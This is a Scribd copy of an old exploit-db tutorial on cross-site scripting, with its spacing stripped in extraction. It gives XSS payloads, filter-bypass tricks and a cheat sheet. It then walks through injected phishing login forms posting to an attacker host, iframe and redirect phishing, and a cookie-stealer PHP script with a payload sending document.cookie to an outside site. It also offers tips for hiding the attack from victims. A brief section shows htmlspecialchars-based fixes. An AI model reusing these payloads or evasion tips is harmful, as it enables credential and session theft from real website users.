Scribd
Upload
296 views

Advanced XSS Hack

Index: ° ‐‐( I ]> Introduction . ° ‐‐( II ]> What exactly is XSS ? . ° ‐‐( III ]> How to execute XSS commands. ° ‐‐( IV ]> Bypass techniques . ° ‐‐( V ]> What can we do with XSS ? . ° ‐‐( VI ]> How to fix XSS leakages . °

Uploaded by

qasdfgt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
296 views

Advanced XSS Hack

Index: ° ‐‐( I ]> Introduction . ° ‐‐( II ]> What exactly is XSS ? . ° ‐‐( III ]> How to execute XSS commands. ° ‐‐( IV ]> Bypass techniques . ° ‐‐( V ]> What can we do with XSS ? . ° ‐‐( VI ]> How to fix XSS leakages . °

Uploaded by

qasdfgt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<|
[___________________________________________________________________________]
|>

[AdvancedXSSKnowledge]

writtenbynovaca!ne

<|
[___________________________________________________________________________]
|>
#Author:novaca!ne
#Date:23.03.2010

.................
Contact:[email protected]
Website:www.novacaine.biz.

Artworkby:Vincenzo.

Greetzflyoutto:.

Vincenzo,J0hn.X3r,fred777,.
h0yt3r,EasyLaster,td0s,
Lorenz,Montaxx,maoshe,Palme.
andfreehack.com
.................
....................
Index:
(I]>Introduction.

(II]>WhatexactlyisXSS?.

(III]>HowtoexecuteXSScommands.

(IV]>Bypasstechniques.

(V]>WhatcanwedowithXSS?.

(VI]>HowtofixXSSleakages.

https://www.exploitdb.com/papers/13646/

1/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

(VII]>CheatSheets.
...................

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(I]>Introduction
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$Dearreader,IwrotethisWhitepapertosumupeverythingIknow
aboutXSS.
$Itwaswrittentoshareknowledge,knowledgeshouldbefreeand
available
$foreveryone.
$YoucanpostandcopythisWhitepaperasmuchasyouwant,but
respectthe
$author'scopyrights.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(II]>WhatexactlyisXSS?

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$"XSS"isashortformfor:"CrossSiteScripting"asyoucansee
bythename,XSS
$dealswithscripting.Tobemoreexact:Javascript.
$It'saboutinjecting(almost)everyJavascript(andhtml/css)
$command/scriptinawebsite.
$XSSflawscomesupeverytimeawebsitedoesn'tfilterthe
attackersinput.
$Inotherwords:
$theattackercaninjecthismaliciousscriptintoawebsite,and
thebrowserjust
$run'sthecodeorscript.
$Thereare3typesofXSS,I'mgoingtotalkaboutthe2most
used:
$ReflectedXSSAttack:
$Whenaattackerinjecthismaliciousscriptintoasearchquery,
asearchbox,
$ortheendofanurl,it'scalledReflectedXSSAttack.It's
likethrowingaball
$againstawallandreceivehimback.
$StoredXSSAttack:
$IswhenaninjectedXSSscriptisstoredpermanentonawebsite,
forexamplein
$aguestbookorbulletinboard.StoredXSShit'severyonewho
justreachesthe
$sitewiththemaliciouscode.
https://www.exploitdb.com/papers/13646/

2/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$DOMbasedXSS:
$Thisisarareusedmethod,perhapsI'mgoingtowriteanother
Whitepaperabout
$DOMbasedXSSattack.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(III]>HowtoexecuteXSScommands

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$Actually,injectingaXSSscriptisveryeasy.Tocheckifthe
targetwebsiteis
$vulnerable,justlookoutforasearchboxorsomething.
$Let'ssaythisishowasimple,unsecuredsearchfunctionlooks
like:
contentofindex.html
<html>
<head>
<title>Google</title>
</head>
<body>

<formmethod="get"action="search.php">
Google:
<inputtype="text"name="search"size="20"/>
<inputtype="submit"class="button"value="Submit"/>
</form>

</body>
</html>
contentofgoogle.php
<?phpecho$_GET['search'];?>
#I'mgoingtousethisscriptasanexamplefortherestofthis
paper#
$Let'ssaythisscriptisstoredonawebspace,whenItypein:
$123
$thenitleadsmetotheurl:
http://site.ru/google.php?search=123
$andshowsme
https://www.exploitdb.com/papers/13646/

3/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

123
$Butnow,let'strytoinjectasimplejavascriptalertmessage:
<script>alert("turtles");</script>
$andsendit.
$Youcanreplace"turtles"withanyotherwordyouwant,andeven
use''instead
$of""forexample:
<script>alert('1234');</script>
$ButI'mkeepusing"turtles"asexamplefortherestofthis
paper.
$Thetargetwebsitelet'susknowifit'svulnerablewhenit
printsapopupcontaining
$|=========||======|
$|turtles|or|1234|
$|=========||======|
$Insteadofthecalledcode,wecaneveninjecteverysimplehtml
tagse.g.:
<h1><fontcolor="#00FF00">Iliketurtles</font></h1>
$andsendit.
$Also,youcanpastethecodeattheendoftheurl,andvisit
thesitelike:
www.site.ru/google.php?search=<script>alert('turtles');</script>
$or
www.site.ru/google.php?search=<h1><fontcolor="#00FF00">Ilike
turtles</font></h1>
#It'sliketheattackerisdeterminingthecontentofthe
website.#
$Butevenifthisdoesn'twork,there'snoreasontoworry:that
meansthewebsite
$usesfiltertechniquestoavoidXSSflaws.Buttherearealso
waysto
$bypassthosefilters.Howthisworks,you'regoingtoreadin
thenextchapter.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
https://www.exploitdb.com/papers/13646/

4/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

|(IV]>Bypasstechniques
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$TherearealotofwaystobypassXSSfiltersonwebsites,I'll
numbersome:
$1.)magic_quotes_gpc=ONbypass
$2.)HEXencoding
$3.)Obfuscation
$4.)Tryingaround
$1.)magic_quotes_gpc=ONisaphpsetting(php.ini).
$Itcausesthatevery'(singlequote),"(doublequote)and
\(backslash)
$areescapedwithabackslashautomatically.It'salsoawell
knownmethod
$toavoidXSSflaws,althoughit'sexploitable.

$Howtobypassitwhenit'sON?usethejavascriptfunction
called
$String.fromCharCode(),justconvertyourtextindecimal
characters
$(e.g.here:http://www.asciizeichen.de/tabelle.html)andput
theminthehandling.
$Using"turtles"(withoutquotesign)willlooklikethis:

String.fromCharCode(116,117,114,116,108,101,115)

$nowinsertthisinyouralertscript:
www.site.ru/google.php?search=
<script>alert(String.fromCharCode(116,117,114,116,108,101,
115));</script>
$2.)HEXencodingisausefulbypassmethod,too.Usingthis
stepwillencode
$yourscript,soyoucan'tseeclearlyonthefirstlook
whatthecodewillcause.
$Thisishow
<script>alert(/turtles/);</script>
$lookslikeencryptedinHEX:
www.site.ru/google.php?

search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%

$3.)Obfuscationsometimeswebsiteadministratorsimplyput
https://www.exploitdb.com/papers/13646/

5/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

wordslike
$"script","alert()","''"onthe"badwordslist",thatmeans,
whenyou
$searchfor"script"onthewebsite,itjustshowsyouan
error,like
$"youarenotallowedtosearchforthisword"orsomething.
$butthisisaweakprotection,youcanbypassitusing
obfuscation.
$yourjavascriptcodelike:
<sCrIpT>alert('turtles');</ScRiPt>
$Therearelikeunlimitedpossibilities,butthatleadsusto
the
$nextchapter...
$4.)Tryingaround:sometimesyoujustgottotryaround,because
everywebsite
$issecured/unsecuredinadifferent,uniqueway.Some
doesn'tevenuse
$cookiesforexample.Alway'skeepalookatthewebsite's
sourcecode!
$SometimesyouneedtoadjustyourXSSscript,like:
"><script>alert(/turtles/);</script>
$Thisyouneedsometimesifyouinjectedyourcodeintoa
searchboxe.g.and
$interruptahtmltag,soyoufirstneedtoclosehim,thenstart
anew
$tag(<script>...).
$Anyway,therearelot'sofdifferentmethodshowtobypassXSS
filtration,
$tryaround!

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(V]>WhatcanwedowithXSS?

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$TilnowIshowedyouhowtospawnajavascriptalertmessageon
awebsite.
$ButnowI'llshowyouhowharmfulsuchaXSSflawcanbefor
yourwebsite.Hereare
$someattacktechniquesyoucandowithaXSSflaw:
$1.)InjectaPhishingscript
$2.)IframePhishing
https://www.exploitdb.com/papers/13646/

6/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$3.)RedirictPhishing
$4.)Cookiestealing
$1.)Phishingscriptinject:Justinjecta'user'and'password'
fieldinhtml
$(Withthe<html>and<body>tags),thatthevictimmaythink
heneed's
$tologintothetargetsite.
$Hereanexample:
www.site.ru/google.php?search=<html><body><head><meta
content="text/html;charset=utf8"></meta></head>
<divstyle="textalign:center;"><formMethod="POST"
Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage:<br/><br/>Username:<br/><inputname="User"/>
<br/>Password:<br/>
<inputname="Password"type="password"/><br/><br/><input
name="Valid"value="Ok!"type="submit"/>
<br/></form></div></body></html>
contentofphishingscript.php
<?php
$login=$_POST['user'];
$password=$_POST['Password'];
$open=fopen('log.txt','a+');
fputs($open,'Username:'.$login.'<br>'.'
Password:'.$password.'<br>'.'<br>');
?>
$2.)IframePhishing:Simplething,justinjectajavascriptcode
containingan
$iframewhereyourphishingsiteisembeeded.
$Obviouslyitneedstolookjustlikethetargetsite.
$Hereanexample:
www.site.ru/google.php?search=<iframe
src="http://www.yourphishingsite.ru"height="100%"width="100%">
</iframe>
$(Note:height="100%"width="100%"meansthatthewholewindowis
filledwith
$thatiframe.)
$ThetargetsitewillspawnyourphishingsiteinanIframe,and
thewebsiteuser/victimswon'tseea
$differenceandlogin(Ifthey'rearefoolishenough).
https://www.exploitdb.com/papers/13646/

7/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$3.)RedirictionPhishing:Alsosimple,justinjectajavascript
rediriction
$scriptthatleadstoyourphishingsite,ofcourseitneeds
tolookjust
$likethetargetsite.
$Hereanexample:
www.site.ru/google.php?search=
<script>document.location.href="http://www.yourphishingsite.ru"
</script>
$or
www.site.ru/google.php?search=<METAHTTPEQUIV="refresh"
CONTENT="0;URL="http://www.yorphishingsite.ru">
$4.)Cookiestealing:OneofthefearedthingsinXSSflawsis
thecookiestealing
$attack.Inthismethodyouneedtodofollowing:
$Placethiscookiestealer.phpinyourhoster,andtheninject
ajavascript
$withyourcookiestealerscriptembeddedonyourtarget
website.

contentofcookiestealer.php(founditsomewherewithgoogle)
<?php
$cookie=$HTTP_GET_VARS["cookie"];
$file=fopen('log.txt','a');
fwrite($file,$cookie."nn");
fclose($file);
?>
$Saveitascookiestealer.phpandcreatea'log.txt'andupload
bothfiles
$onyourownwebspace,inthesamedirectoryandset"chmod777".
$Injectthefollowingcodeinyourtargetwebsite:
http://www.site.ru/google.php?search=<script>location.href=
'http://phishingsite.ru/cookiestealer.php?
cookie='+document.cookie;</script>
$Thenthevictim'scookie(target'swebsiteuserwhovisitedthe
urlabove)should
$appearinthelog.txt.
$Nowyousimplyneedtoinsertthecookie(withe.g.livehttp
https://www.exploitdb.com/papers/13646/

8/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

headersfirefoxaddon)
$anduseit.
$Obviouslyyouneedtoreplace
http://www.yourphishingsite.ru
$Withtheurlofyourphishingsite.
#PROTIP:renameyour'cookiestealer.php'tosomethinglike
'turtles.php',#
#thislookslesssuspicous.
#
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.
~>
|(VI]>HowtofixXSSleakages

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$XSSflawscanbeverydangerousforyourwebsite,eventhough
youcaneasily
$secureyourownwebsiteusingthefollowingfunctions.
##########################################################
##
#htmlspecialchars()#
#http://php.net/manual/de/function.htmlspecialchars.php#
##
##########################################################
Exampleusage:
google.php:
<?phpechohtmlspecialchars($_GET['search']);?>
$OR
##########################################################
##
#htmlentities()#
#http://php.net/manual/de/function.htmlentities.php#
##
##########################################################
Exampleusage:
google.php:
https://www.exploitdb.com/papers/13646/

9/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<?phpechohtmlentities($_GET['search']);?>
$Whathappened?thefunctionsimplyreplacedeveryspecialchar
toaharmlesshtmlchar.
$ForexamplewhenIenter
<script>alert("turtles");</script>
$itappears
<script>alert("turtles");</script>
$Butwithoutanypopup,becausethe<,>,',"
$turnedinto<,>,',"
$Theattackersinputhasbecomeaharmless,unexecutablehtml
code.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VII]>CheatSheets
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$HereistheXSScheatsheet,whereIgotmostofthemfrom
http://ha.ckers.org/xss.html.
$Enjoy.
'';!"<XSS>=&{()}
<SCRIPTSRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMGSRC="javascript:alert('XSS');">
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=`javascript:alert("RSnakesays,'XSS'")`>
<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
<IMGSRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC="javascript:alert('XSS');">
<IMGSRC="jav

ascript:alert('XSS');">

https://www.exploitdb.com/papers/13646/

10/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<IMGSRC="jav
ascript:alert('XSS');">
#############################################################
##
#PROTIPFOREVERYXSSINJECTION:#
#useurlshortenerservicessuchastinyurl.comorbit.ly#
#to'hide'yourinjection,sothevictimwon'tknowwhat's#
#behindthaturl.#
##
#############################################################
ENDOFFILE

https://www.exploitdb.com/papers/13646/

11/11

You might also like